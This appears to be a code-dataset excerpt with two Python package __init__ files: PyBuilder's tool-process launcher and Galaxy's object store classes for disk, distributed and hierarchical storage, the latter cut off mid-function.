source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
__init__.py | # -*- coding: utf-8 -*-
#
# This file is part of PyBuilder
#
# Copyright 2011-2020 PyBuilder Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pybuilder.remote import Process, PipeShutdownError, RemoteObjectPipe, logger, log_to_stderr
__all__ = ["RemoteObjectPipe", "start_tool", "Tool", "PipeShutdownError", "logger"]
class Tool:
    """Interface for tools managed by a tool process.

    Subclasses override :meth:`start` and :meth:`stop`; the default
    implementations are no-ops.
    """

    def start(self, pipe):
        """Start this tool inside the tool process."""

    def stop(self, pipe):
        """Stop this tool inside the tool process."""
def start_tool(pyenv, tools, group=None, name=None, logging=None):
    """
    Starts a tool process.

    :param pyenv: the Python environment the child process runs in
    :param tools: iterable of tools started inside the child process
    :param group: optional process group
    :param name: optional process name
    :param logging: optional log level; when truthy, stderr logging is
        enabled and the logger level is set to ``int(logging)``
    :return: tuple ``(process, pipe)``
    """
    if logging:
        log_to_stderr()
        logger.setLevel(int(logging))

    remote_pipe = RemoteObjectPipe.new_pipe()
    tool_proc = Process(pyenv,
                        group=group,
                        target=_instrumented_tool,
                        name=name,
                        args=(tools, remote_pipe))
    try:
        tool_proc.start()
    finally:
        # The parent keeps only the server end of the pipe open.
        remote_pipe.close_client_side()

    remote_pipe.receive()  # Pickle protocol selection
    return tool_proc, remote_pipe
def _instrumented_tool(tools, pipe):
    """Child-process entry point: start every tool, serve the pipe until
    shutdown is signalled, then stop the tools in reverse order."""
    try:
        for current_tool in tools:
            current_tool.start(pipe)
        # Serve remote requests until the parent shuts the pipe down.
        while True:
            pipe.receive()
    except PipeShutdownError:
        # Orderly shutdown requested by the parent - unwind in reverse.
        for current_tool in reversed(tools):
            current_tool.stop(pipe)
    except (SystemExit, KeyboardInterrupt):
        raise
    except Exception as e:
        # Report the failure back to the parent through the pipe.
        pipe.close(e)
    finally:
        pipe.close()
|
__init__.py | """
objectstore package, abstraction for storing blobs of data for use in Galaxy.
all providers ensure that data can be accessed on the filesystem for running
tools
"""
import logging
import os
import random
import shutil
import threading
import time
from collections import OrderedDict
from xml.etree import ElementTree
import yaml
try:
from sqlalchemy.orm import object_session
except ImportError:
object_session = None
from galaxy.exceptions import ObjectInvalid, ObjectNotFound
from galaxy.util import (
directory_hash_id,
force_symlink,
umask_fix_perms,
)
from galaxy.util.bunch import Bunch
from galaxy.util.path import (
safe_makedirs,
safe_relpath,
)
from galaxy.util.sleeper import Sleeper
NO_SESSION_ERROR_MESSAGE = "Attempted to 'create' object store entity in configuration with no database session present."
log = logging.getLogger(__name__)
class ObjectStore(object):
    """ObjectStore abstract interface.

    FIELD DESCRIPTIONS (these apply to all the methods in this class):

    :type obj: StorableObject
    :param obj: A Galaxy object with an assigned database ID accessible via
        the .id attribute.

    :type base_dir: string
    :param base_dir: A key in `self.extra_dirs` corresponding to the base
        directory in which this object should be created, or `None` to specify
        the default directory.

    :type dir_only: boolean
    :param dir_only: If `True`, check only the path where the file identified
        by `obj` should be located, not the dataset itself. This option applies
        to `extra_dir` argument as well.

    :type extra_dir: string
    :param extra_dir: Append `extra_dir` to the directory structure where the
        dataset identified by `obj` should be located. (e.g.,
        000/extra_dir/obj.id). Valid values include 'job_work' (defaulting to
        config.jobs_directory = '$GALAXY_ROOT/database/jobs_directory');
        'temp' (defaulting to config.new_file_path =
        '$GALAXY_ROOT/database/tmp').

    :type extra_dir_at_root: boolean
    :param extra_dir_at_root: Applicable only if `extra_dir` is set. If True,
        the `extra_dir` argument is placed at root of the created directory
        structure rather than at the end (e.g., extra_dir/000/obj.id vs.
        000/extra_dir/obj.id)

    :type alt_name: string
    :param alt_name: Use this name as the alternative name for the created
        dataset rather than the default.

    :type obj_dir: boolean
    :param obj_dir: Append a subdirectory named with the object's ID (e.g.
        000/obj.id)
    """

    def __init__(self, config, config_dict=None, **kwargs):
        """
        :type config: object
        :param config: An object, most likely populated from
            `galaxy/config.ini`, having the following attributes:

            * object_store_check_old_style (only used by the
              :class:`DiskObjectStore` subclass)
            * jobs_directory -- Each job is given a unique empty directory
              as its current working directory. This option defines in what
              parent directory those directories will be created.
            * new_file_path -- Used to set the 'temp' extra_dir.

        :type config_dict: dict
        :param config_dict: Store-specific configuration (e.g. from a parsed
            XML/YAML description). Defaults to an empty dict. A fresh dict is
            created per call -- the previous ``config_dict={}`` default was a
            shared mutable object that could leak state between instances.
        """
        if config_dict is None:
            config_dict = {}
        self.running = True
        self.config = config
        self.check_old_style = config.object_store_check_old_style
        # Datasets may be addressed by database id or by UUID; the config
        # dict takes precedence over the global config attribute.
        self.store_by = config_dict.get("store_by", None) or getattr(config, "object_store_store_by", "id")
        assert self.store_by in ["id", "uuid"]
        extra_dirs = {}
        extra_dirs['job_work'] = config.jobs_directory
        extra_dirs['temp'] = config.new_file_path
        extra_dirs.update(dict(
            (e['type'], e['path']) for e in config_dict.get('extra_dirs', [])))
        self.extra_dirs = extra_dirs

    def shutdown(self):
        """Close any connections for this ObjectStore."""
        self.running = False

    def exists(self, obj, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None):
        """Return True if the object identified by `obj` exists, False otherwise."""
        raise NotImplementedError()

    def file_ready(self, obj, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
        """
        Check if a file corresponding to a dataset is ready to be used.

        Return True if so, False otherwise
        """
        return True

    def create(self, obj, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
        """
        Mark the object (`obj`) as existing in the store, but with no content.

        This method will create a proper directory structure for
        the file if the directory does not already exist.
        """
        raise NotImplementedError()

    def empty(self, obj, base_dir=None, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
        """
        Test if the object identified by `obj` has content.

        If the object does not exist raises `ObjectNotFound`.
        """
        raise NotImplementedError()

    def size(self, obj, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
        """
        Return size of the object identified by `obj`.

        If the object does not exist, return 0.
        """
        raise NotImplementedError()

    def delete(self, obj, entire_dir=False, base_dir=None, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
        """
        Delete the object identified by `obj`.

        :type entire_dir: boolean
        :param entire_dir: If True, delete the entire directory pointed to by
                           extra_dir. For safety reasons, this option applies
                           only for and in conjunction with the extra_dir or
                           obj_dir options.
        """
        raise NotImplementedError()

    def get_data(self, obj, start=0, count=-1, base_dir=None, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
        """
        Fetch `count` bytes of data offset by `start` bytes using `obj.id`.

        If the object does not exist raises `ObjectNotFound`.

        :type start: int
        :param start: Set the position to start reading the dataset file

        :type count: int
        :param count: Read at most `count` bytes from the dataset
        """
        raise NotImplementedError()

    def get_filename(self, obj, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
        """
        Get the expected filename with absolute path for object with id `obj.id`.

        This can be used to access the contents of the object.
        """
        raise NotImplementedError()

    def update_from_file(self, obj, base_dir=None, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False, file_name=None, create=False):
        """
        Inform the store that the file associated with `obj.id` has been updated.

        If `file_name` is provided, update from that file instead of the
        default.
        If the object does not exist raises `ObjectNotFound`.

        :type file_name: string
        :param file_name: Use file pointed to by `file_name` as the source for
                          updating the dataset identified by `obj`

        :type create: boolean
        :param create: If True and the default dataset does not exist, create
            it first.
        """
        raise NotImplementedError()

    def get_object_url(self, obj, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
        """
        Return the URL for direct access if supported, otherwise return None.

        Note: need to be careful to not bypass dataset security with this.
        """
        raise NotImplementedError()

    def get_store_usage_percent(self):
        """Return the percentage indicating how full the store is."""
        raise NotImplementedError()

    @classmethod
    def parse_xml(clazz, config_xml):
        """Parse an XML description of a configuration for this object store.

        Return a configuration dictionary (such as would correspond to the YAML configuration)
        for the object store.
        """
        raise NotImplementedError()

    @classmethod
    def from_xml(clazz, config, config_xml, **kwd):
        """Alternate constructor: build a store from an XML configuration element."""
        config_dict = clazz.parse_xml(config_xml)
        return clazz(config, config_dict, **kwd)

    def to_dict(self):
        """Serialize this store's configuration to a plain dict.

        NOTE(review): relies on ``self.store_type`` and ``config_to_dict``,
        both provided by subclasses / elsewhere in this module.
        """
        extra_dirs = []
        for extra_dir_type, extra_dir_path in self.extra_dirs.items():
            extra_dirs.append({"type": extra_dir_type, "path": extra_dir_path})
        return {
            'config': config_to_dict(self.config),
            'extra_dirs': extra_dirs,
            'store_by': self.store_by,
            'type': self.store_type,
        }

    def _get_object_id(self, obj):
        """Return the identifier (id or uuid, per ``store_by``) for `obj`."""
        if hasattr(obj, self.store_by):
            return getattr(obj, self.store_by)
        else:
            # job's don't have uuids, so always use ID in this case when creating
            # job working directories.
            return obj.id
class DiskObjectStore(ObjectStore):
    """
    Standard Galaxy object store.

    Stores objects in files under a specific directory on disk.

    >>> from galaxy.util.bunch import Bunch
    >>> import tempfile
    >>> file_path=tempfile.mkdtemp()
    >>> obj = Bunch(id=1)
    >>> s = DiskObjectStore(Bunch(umask=0o077, jobs_directory=file_path, new_file_path=file_path, object_store_check_old_style=False), dict(files_dir=file_path))
    >>> s.create(obj)
    >>> s.exists(obj)
    True
    >>> assert s.get_filename(obj) == file_path + '/000/dataset_1.dat'
    """
    store_type = 'disk'

    def __init__(self, config, config_dict):
        """
        :type config: object
        :param config: An object, most likely populated from
            `galaxy/config.ini`, having the same attributes needed by
            :class:`ObjectStore` plus:

            * file_path -- Default directory to store objects to disk in.
            * umask -- the permission bits for newly created files.

        :type config_dict: dict
        :param config_dict: May contain a `files_dir` key overriding
            `config.file_path`, and an `extra_dirs` list.
        """
        super(DiskObjectStore, self).__init__(config, config_dict)
        self.file_path = config_dict.get("files_dir") or config.file_path

    @classmethod
    def parse_xml(clazz, config_xml):
        """Build a config dict from a `<files_dir>`/`<extra_dir>` XML element."""
        extra_dirs = []
        config_dict = {}
        if config_xml is not None:
            for e in config_xml:
                if e.tag == 'files_dir':
                    config_dict["files_dir"] = e.get('path')
                else:
                    extra_dirs.append({"type": e.get('type'), "path": e.get('path')})
        config_dict["extra_dirs"] = extra_dirs
        return config_dict

    def to_dict(self):
        """Extend the base serialization with this store's files directory."""
        as_dict = super(DiskObjectStore, self).to_dict()
        as_dict["files_dir"] = self.file_path
        return as_dict

    def _get_filename(self, obj, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False):
        """
        Return the absolute path for the file corresponding to the `obj.id`.

        This is regardless of whether or not the file exists.
        """
        path = self._construct_path(obj, base_dir=base_dir, dir_only=dir_only, extra_dir=extra_dir,
                                    extra_dir_at_root=extra_dir_at_root, alt_name=alt_name,
                                    obj_dir=False, old_style=True)
        # For backward compatibility: check the old style root path first;
        # otherwise construct hashed path.
        if not os.path.exists(path):
            return self._construct_path(obj, base_dir=base_dir, dir_only=dir_only, extra_dir=extra_dir,
                                        extra_dir_at_root=extra_dir_at_root, alt_name=alt_name)
        # BUG FIX: previously this method fell through and implicitly returned
        # None whenever the old-style path existed; return it explicitly.
        return path

    # TODO: rename to _disk_path or something like that to avoid conflicts with
    # children that'll use the local_extra_dirs decorator, e.g. S3
    def _construct_path(self, obj, old_style=False, base_dir=None, dir_only=False, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False, **kwargs):
        """
        Construct the absolute path for accessing the object identified by `obj.id`.

        :type base_dir: string
        :param base_dir: A key in self.extra_dirs corresponding to the base
                         directory in which this object should be created, or
                         None to specify the default directory.

        :type dir_only: boolean
        :param dir_only: If True, check only the path where the file
                         identified by `obj` should be located, not the
                         dataset itself. This option applies to `extra_dir`
                         argument as well.

        :type extra_dir: string
        :param extra_dir: Append the value of this parameter to the expected
            path used to access the object identified by `obj` (e.g.,
            /files/000/<extra_dir>/dataset_10.dat).

        :type alt_name: string
        :param alt_name: Use this name as the alternative name for the returned
                         dataset rather than the default.

        :type old_style: boolean
        :param old_style: This option is used for backward compatibility. If
            `True` then the composed directory structure does not include a
            hash id (e.g., /files/dataset_10.dat (old) vs.
            /files/000/dataset_10.dat (new))

        :raises ObjectInvalid: if `extra_dir` or `alt_name` could escape the
            store's directory tree.
        """
        base = os.path.abspath(self.extra_dirs.get(base_dir, self.file_path))
        # extra_dir should never be constructed from provided data but just
        # make sure there are no shenannigans afoot
        if extra_dir and extra_dir != os.path.normpath(extra_dir):
            log.warning('extra_dir is not normalized: %s', extra_dir)
            raise ObjectInvalid("The requested object is invalid")
        # ensure that any parent directory references in alt_name would not
        # result in a path not contained in the directory path constructed here
        if alt_name and not safe_relpath(alt_name):
            log.warning('alt_name would locate path outside dir: %s', alt_name)
            raise ObjectInvalid("The requested object is invalid")
        obj_id = self._get_object_id(obj)
        if old_style:
            if extra_dir is not None:
                path = os.path.join(base, extra_dir)
            else:
                path = base
        else:
            # Construct hashed path
            rel_path = os.path.join(*directory_hash_id(obj_id))
            # Create a subdirectory for the object ID
            if obj_dir:
                rel_path = os.path.join(rel_path, str(obj_id))
            # Optionally append extra_dir
            if extra_dir is not None:
                if extra_dir_at_root:
                    rel_path = os.path.join(extra_dir, rel_path)
                else:
                    rel_path = os.path.join(rel_path, extra_dir)
            path = os.path.join(base, rel_path)
        if not dir_only:
            assert obj_id is not None, "The effective dataset identifier consumed by object store [%s] must be set before a path can be constructed." % (self.store_by)
            path = os.path.join(path, alt_name if alt_name else "dataset_%s.dat" % obj_id)
        return os.path.abspath(path)

    def exists(self, obj, **kwargs):
        """Override `ObjectStore`'s stub and check on disk."""
        if self.check_old_style:
            path = self._construct_path(obj, old_style=True, **kwargs)
            # For backward compatibility: check root path first; otherwise
            # construct and check hashed path.
            if os.path.exists(path):
                return True
        return os.path.exists(self._construct_path(obj, **kwargs))

    def create(self, obj, **kwargs):
        """Override `ObjectStore`'s stub by creating any files and folders on disk."""
        if not self.exists(obj, **kwargs):
            path = self._construct_path(obj, **kwargs)
            dir_only = kwargs.get('dir_only', False)
            # Create directory if it does not exist
            target_dir = path if dir_only else os.path.dirname(path)
            safe_makedirs(target_dir)
            # Create the (empty) file if it does not exist
            if not dir_only:
                with open(path, 'w'):
                    pass
                umask_fix_perms(path, self.config.umask, 0o666)

    def empty(self, obj, **kwargs):
        """Override `ObjectStore`'s stub by checking file size on disk."""
        return self.size(obj, **kwargs) == 0

    def size(self, obj, **kwargs):
        """Override `ObjectStore`'s stub by return file size on disk.

        Returns 0 if the object doesn't exist yet or other error.
        """
        if self.exists(obj, **kwargs):
            try:
                filepath = self.get_filename(obj, **kwargs)
                for _ in range(0, 2):
                    size = os.path.getsize(filepath)
                    if size != 0:
                        break
                    # May be legitimately 0, or there may be an issue with the FS / kernel, so we try again
                    time.sleep(0.01)
                return size
            except OSError:
                return 0
        else:
            return 0

    def delete(self, obj, entire_dir=False, **kwargs):
        """Override `ObjectStore`'s stub; delete the file or folder on disk."""
        path = self.get_filename(obj, **kwargs)
        extra_dir = kwargs.get('extra_dir', None)
        obj_dir = kwargs.get('obj_dir', False)
        try:
            # Only remove whole trees when scoped by extra_dir/obj_dir, for safety.
            if entire_dir and (extra_dir or obj_dir):
                shutil.rmtree(path)
                return True
            if self.exists(obj, **kwargs):
                os.remove(path)
                return True
        except OSError as ex:
            log.critical('%s delete error %s' % (self._get_filename(obj, **kwargs), ex))
        return False

    def get_data(self, obj, start=0, count=-1, **kwargs):
        """Override `ObjectStore`'s stub; retrieve data directly from disk."""
        # Text mode retained for backward compatibility (should arguably be 'rb');
        # the context manager guarantees the handle is closed even on error.
        with open(self.get_filename(obj, **kwargs), 'r') as data_file:
            data_file.seek(start)
            return data_file.read(count)

    def get_filename(self, obj, **kwargs):
        """
        Override `ObjectStore`'s stub.

        If `object_store_check_old_style` is set to `True` in config then the
        root path is checked first.

        :raises ObjectNotFound: if neither the old-style nor hashed path exists.
        """
        if self.check_old_style:
            path = self._construct_path(obj, old_style=True, **kwargs)
            # For backward compatibility, check root path first; otherwise,
            # construct and return hashed path
            if os.path.exists(path):
                return path
        path = self._construct_path(obj, **kwargs)
        if not os.path.exists(path):
            raise ObjectNotFound
        return path

    def update_from_file(self, obj, file_name=None, create=False, **kwargs):
        """`create` parameter is not used in this implementation."""
        preserve_symlinks = kwargs.pop('preserve_symlinks', False)
        # FIXME: symlinks and the object store model may not play well together
        # these should be handled better, e.g. registering the symlink'd file
        # as an object
        if create:
            self.create(obj, **kwargs)
        if file_name and self.exists(obj, **kwargs):
            try:
                if preserve_symlinks and os.path.islink(file_name):
                    force_symlink(os.readlink(file_name), self.get_filename(obj, **kwargs))
                else:
                    path = self.get_filename(obj, **kwargs)
                    shutil.copy(file_name, path)
                    umask_fix_perms(path, self.config.umask, 0o666)
            except IOError as ex:
                log.critical('Error copying %s to %s: %s' % (file_name, self._get_filename(obj, **kwargs), ex))
                raise ex

    def get_object_url(self, obj, **kwargs):
        """
        Override `ObjectStore`'s stub.

        Returns `None`, we have no URLs.
        """
        return None

    def get_store_usage_percent(self):
        """Override `ObjectStore`'s stub by return percent storage used."""
        st = os.statvfs(self.file_path)
        return (float(st.f_blocks - st.f_bavail) / st.f_blocks) * 100
class NestedObjectStore(ObjectStore):
    """
    Base for ObjectStores that delegate to other ObjectStores.

    Example: DistributedObjectStore, HierarchicalObjectStore
    """

    def __init__(self, config, config_xml=None):
        """Extend `ObjectStore`'s constructor with an empty backend map."""
        super(NestedObjectStore, self).__init__(config)
        self.backends = {}

    def shutdown(self):
        """Shut every backend down, then this store itself."""
        for backend in self.backends.values():
            backend.shutdown()
        super(NestedObjectStore, self).shutdown()

    def exists(self, obj, **kwargs):
        """Determine if the `obj` exists in any of the backends."""
        return self._call_method('exists', obj, False, False, **kwargs)

    def file_ready(self, obj, **kwargs):
        """Determine if the file for `obj` is ready to be used by any of the backends."""
        return self._call_method('file_ready', obj, False, False, **kwargs)

    def create(self, obj, **kwargs):
        """Create a backing file in a random backend."""
        chosen_backend = random.choice(list(self.backends.values()))
        chosen_backend.create(obj, **kwargs)

    def empty(self, obj, **kwargs):
        """For the first backend that has this `obj`, determine if it is empty."""
        return self._call_method('empty', obj, True, False, **kwargs)

    def size(self, obj, **kwargs):
        """For the first backend that has this `obj`, return its size."""
        return self._call_method('size', obj, 0, False, **kwargs)

    def delete(self, obj, **kwargs):
        """For the first backend that has this `obj`, delete it."""
        return self._call_method('delete', obj, False, False, **kwargs)

    def get_data(self, obj, **kwargs):
        """For the first backend that has this `obj`, get data from it."""
        return self._call_method('get_data', obj, ObjectNotFound, True, **kwargs)

    def get_filename(self, obj, **kwargs):
        """For the first backend that has this `obj`, get its filename."""
        return self._call_method('get_filename', obj, ObjectNotFound, True, **kwargs)

    def update_from_file(self, obj, **kwargs):
        """For the first backend that has this `obj`, update it from the given file."""
        if kwargs.get('create', False):
            self.create(obj, **kwargs)
        # Delegated call must not create again.
        kwargs['create'] = False
        return self._call_method('update_from_file', obj, ObjectNotFound, True, **kwargs)

    def get_object_url(self, obj, **kwargs):
        """For the first backend that has this `obj`, get its URL."""
        return self._call_method('get_object_url', obj, None, False, **kwargs)

    def _repr_object_for_exception(self, obj):
        """Best-effort human-readable description of `obj` for error messages."""
        try:
            # there are a few objects in python that don't have __class__
            obj_id = self._get_object_id(obj)
            return '{}({}={})'.format(obj.__class__.__name__, self.store_by, obj_id)
        except AttributeError:
            return str(obj)

    def _call_method(self, method, obj, default, default_is_exception, **kwargs):
        """Invoke `method` on the first backend holding `obj`.

        When no backend has it, raise `default` if `default_is_exception`,
        otherwise return `default`.
        """
        for backend in self.backends.values():
            if backend.exists(obj, **kwargs):
                return getattr(backend, method)(obj, **kwargs)
        if default_is_exception:
            raise default('objectstore, _call_method failed: %s on %s, kwargs: %s'
                          % (method, self._repr_object_for_exception(obj), str(kwargs)))
        return default
class DistributedObjectStore(NestedObjectStore):
    """
    ObjectStore that defers to a list of backends.

    When getting objects the first store where the object exists is used.
    When creating objects they are created in a store selected randomly, but
    with weighting.
    """

    # Type identifier used in serialized ("to_dict") configurations.
    store_type = 'distributed'

    def __init__(self, config, config_dict, fsmon=False):
        """
        :type config: object
        :param config: An object, most likely populated from
            `galaxy/config.ini`, having the same attributes needed by
            :class:`NestedObjectStore` plus:

            * distributed_object_store_config_file

        :type config_dict: dict
        :param config_dict: Parsed configuration; must contain a "backends"
            list and may contain "global_max_percent_full".

        :type fsmon: bool
        :param fsmon: If True, monitor the file system for free space,
            removing backends when they get too full.
        """
        super(DistributedObjectStore, self).__init__(config, config_dict)
        self.backends = {}
        # Backend ids repeated proportionally to their weight; random.choice
        # over this list implements the weighted selection in create().
        self.weighted_backend_ids = []
        self.original_weighted_backend_ids = []
        self.max_percent_full = {}
        self.global_max_percent_full = config_dict.get("global_max_percent_full", 0)
        random.seed()
        backends_def = config_dict["backends"]
        for backend_def in backends_def:
            backened_id = backend_def["id"]
            file_path = backend_def["files_dir"]
            extra_dirs = backend_def.get("extra_dirs", [])
            maxpctfull = backend_def.get("max_percent_full", 0)
            weight = backend_def["weight"]
            # NOTE(review): every backend is built as a DiskObjectStore here,
            # regardless of any "type" key in the backend definition — confirm
            # whether non-disk distributed backends are intended.
            disk_config_dict = dict(files_dir=file_path, extra_dirs=extra_dirs)
            self.backends[backened_id] = DiskObjectStore(config, disk_config_dict)
            self.max_percent_full[backened_id] = maxpctfull
            log.debug("Loaded disk backend '%s' with weight %s and file_path: %s" % (backened_id, weight, file_path))
            for i in range(0, weight):
                # The simplest way to do weighting: add backend ids to a
                # sequence the number of times equalling weight, then randomly
                # choose a backend from that sequence at creation
                self.weighted_backend_ids.append(backened_id)
        # NOTE(review): aliases (does not copy) weighted_backend_ids; the
        # monitor below only ever rebinds, never mutates, so this holds.
        self.original_weighted_backend_ids = self.weighted_backend_ids
        self.sleeper = None
        # Start the free-space monitor only when requested and when at least
        # one limit (global or per-backend) is actually configured.
        if fsmon and (self.global_max_percent_full or [_ for _ in self.max_percent_full.values() if _ != 0.0]):
            self.sleeper = Sleeper()
            self.filesystem_monitor_thread = threading.Thread(target=self.__filesystem_monitor)
            # Daemon thread so it does not block interpreter exit.
            self.filesystem_monitor_thread.setDaemon(True)
            self.filesystem_monitor_thread.start()
            log.info("Filesystem space monitor started")

    @classmethod
    def parse_xml(clazz, config_xml, legacy=False):
        """Parse a distributed-store XML description into a config dict.

        With ``legacy=True`` the given element itself is the backends
        container (standalone config file layout); otherwise the backends
        are read from a nested ``<backends>`` element.
        """
        if legacy:
            backends_root = config_xml
        else:
            backends_root = config_xml.find('backends')
        backends = []
        config_dict = {
            'global_max_percent_full': float(backends_root.get('maxpctfull', 0)),
            'backends': backends,
        }
        for elem in [e for e in backends_root if e.tag == 'backend']:
            id = elem.get('id')
            weight = int(elem.get('weight', 1))
            maxpctfull = float(elem.get('maxpctfull', 0))
            elem_type = elem.get('type', 'disk')
            if elem_type:
                path = None
                extra_dirs = []
                for sub in elem:
                    if sub.tag == 'files_dir':
                        path = sub.get('path')
                    elif sub.tag == 'extra_dir':
                        type = sub.get('type')
                        extra_dirs.append({"type": type, "path": sub.get('path')})
                backend_dict = {
                    'id': id,
                    'weight': weight,
                    'max_percent_full': maxpctfull,
                    'files_dir': path,
                    'extra_dirs': extra_dirs,
                    'type': elem_type,
                }
                backends.append(backend_dict)
        return config_dict

    @classmethod
    def from_xml(clazz, config, config_xml, fsmon=False):
        """Create a DistributedObjectStore from inline XML or, when
        `config_xml` is None, from the standalone file named by
        ``config.distributed_object_store_config_file``."""
        legacy = False
        if config_xml is None:
            distributed_config = config.distributed_object_store_config_file
            assert distributed_config is not None, \
                "distributed object store ('object_store = distributed') " \
                "requires a config file, please set one in " \
                "'distributed_object_store_config_file')"
            log.debug('Loading backends for distributed object store from %s', distributed_config)
            config_xml = ElementTree.parse(distributed_config).getroot()
            legacy = True
        else:
            log.debug('Loading backends for distributed object store from %s', config_xml.get('id'))
        config_dict = clazz.parse_xml(config_xml, legacy=legacy)
        return clazz(config, config_dict, fsmon=fsmon)

    def to_dict(self):
        """Serialize the store, reconstructing each backend's weight from
        its occurrence count in the original weighted id list."""
        as_dict = super(DistributedObjectStore, self).to_dict()
        as_dict["global_max_percent_full"] = self.global_max_percent_full
        backends = []
        for backend_id, backend in self.backends.items():
            backend_as_dict = backend.to_dict()
            backend_as_dict["id"] = backend_id
            backend_as_dict["max_percent_full"] = self.max_percent_full[backend_id]
            backend_as_dict["weight"] = len([i for i in self.original_weighted_backend_ids if i == backend_id])
            backends.append(backend_as_dict)
        as_dict["backends"] = backends
        return as_dict

    def shutdown(self):
        """Shut down. Kill the free space monitor if there is one."""
        super(DistributedObjectStore, self).shutdown()
        # super() set self.running = False, so the monitor loop will exit;
        # wake the sleeper so it notices immediately.
        if self.sleeper is not None:
            self.sleeper.wake()

    def __filesystem_monitor(self):
        # Runs in a daemon thread: periodically drops over-full backends from
        # the weighted selection list (rebuilds it from the pristine original
        # list each pass, so backends come back once they have space again).
        while self.running:
            new_weighted_backend_ids = self.original_weighted_backend_ids
            for id, backend in self.backends.items():
                maxpct = self.max_percent_full[id] or self.global_max_percent_full
                pct = backend.get_store_usage_percent()
                if pct > maxpct:
                    new_weighted_backend_ids = [_ for _ in new_weighted_backend_ids if _ != id]
            self.weighted_backend_ids = new_weighted_backend_ids
            self.sleeper.sleep(120)  # Test free space every 2 minutes

    def create(self, obj, **kwargs):
        """The only method in which obj.object_store_id may be None."""
        if obj.object_store_id is None or not self.exists(obj, **kwargs):
            if obj.object_store_id is None or obj.object_store_id not in self.backends:
                try:
                    # Weighted random selection over the (possibly fsmon-pruned) list.
                    obj.object_store_id = random.choice(self.weighted_backend_ids)
                except IndexError:
                    # Empty list: no backend configured or all are over-full.
                    raise ObjectInvalid('objectstore.create, could not generate '
                                        'obj.object_store_id: %s, kwargs: %s'
                                        % (str(obj), str(kwargs)))
                _create_object_in_session(obj)
                log.debug("Selected backend '%s' for creation of %s %s"
                          % (obj.object_store_id, obj.__class__.__name__, obj.id))
            else:
                log.debug("Using preferred backend '%s' for creation of %s %s"
                          % (obj.object_store_id, obj.__class__.__name__, obj.id))
            self.backends[obj.object_store_id].create(obj, **kwargs)

    def _call_method(self, method, obj, default, default_is_exception, **kwargs):
        # Unlike NestedObjectStore, route directly via the object's assigned
        # backend id instead of probing every backend in turn.
        object_store_id = self.__get_store_id_for(obj, **kwargs)
        if object_store_id is not None:
            return self.backends[object_store_id].__getattribute__(method)(obj, **kwargs)
        if default_is_exception:
            raise default('objectstore, _call_method failed: %s on %s, kwargs: %s'
                          % (method, self._repr_object_for_exception(obj), str(kwargs)))
        else:
            return default

    def __get_store_id_for(self, obj, **kwargs):
        # Resolve (and, when possible, repair) the backend id for `obj`.
        if obj.object_store_id is not None:
            if obj.object_store_id in self.backends:
                return obj.object_store_id
            else:
                log.warning('The backend object store ID (%s) for %s object with ID %s is invalid'
                            % (obj.object_store_id, obj.__class__.__name__, obj.id))
        # if this instance has been switched from a non-distributed to a
        # distributed object store, or if the object's store id is invalid,
        # try to locate the object
        for id, store in self.backends.items():
            if store.exists(obj, **kwargs):
                log.warning('%s object with ID %s found in backend object store with ID %s'
                            % (obj.__class__.__name__, obj.id, id))
                obj.object_store_id = id
                _create_object_in_session(obj)
                return id
        return None
class HierarchicalObjectStore(NestedObjectStore):
    """
    ObjectStore that defers to an ordered list of backends.

    When getting objects the first store where the object exists is used.
    When creating objects only the first store is used.
    """
    store_type = 'hierarchical'

    def __init__(self, config, config_dict, fsmon=False):
        """The default constructor. Extends `NestedObjectStore`."""
        super(HierarchicalObjectStore, self).__init__(config, config_dict)
        # Backends keyed by their position; 0 is the primary store.
        self.backends = OrderedDict(
            (position, build_object_store_from_config(config, config_dict=backend_def, fsmon=fsmon))
            for position, backend_def in enumerate(config_dict["backends"]))

    @classmethod
    def parse_xml(clazz, config_xml):
        """Parse `<backends>` children, ordered by their `order` attribute."""
        ordered_elems = sorted(config_xml.find('backends'), key=lambda b: int(b.get('order')))
        backends_list = []
        for elem in ordered_elems:
            store_type = elem.get("type")
            objectstore_class, _ = type_to_object_store_class(store_type)
            backend_config_dict = objectstore_class.parse_xml(elem)
            backend_config_dict["type"] = store_type
            backends_list.append(backend_config_dict)
        return {"backends": backends_list}

    def to_dict(self):
        """Serialize this store and all of its backends."""
        as_dict = super(HierarchicalObjectStore, self).to_dict()
        as_dict["backends"] = [backend.to_dict() for backend in self.backends.values()]
        return as_dict

    def exists(self, obj, **kwargs):
        """Check all child object stores."""
        return any(store.exists(obj, **kwargs) for store in self.backends.values())

    def create(self, obj, **kwargs):
        """Call the primary object store."""
        self.backends[0].create(obj, **kwargs)
def type_to_object_store_class(store, fsmon=False):
    """
    Resolve an object store type name.

    Returns a two-tuple ``(objectstore_class, constructor_kwargs)``; the
    class is ``None`` when the type name is not recognized. Backend modules
    are imported lazily so optional dependencies only load on demand.
    """
    kwds = {}
    cls = None
    if store == 'disk':
        cls = DiskObjectStore
    elif store == 's3':
        from .s3 import S3ObjectStore
        cls = S3ObjectStore
    elif store == 'cloud':
        from .cloud import Cloud
        cls = Cloud
    elif store == 'swift':
        from .s3 import SwiftObjectStore
        cls = SwiftObjectStore
    elif store == 'distributed':
        cls = DistributedObjectStore
        kwds["fsmon"] = fsmon
    elif store == 'hierarchical':
        cls = HierarchicalObjectStore
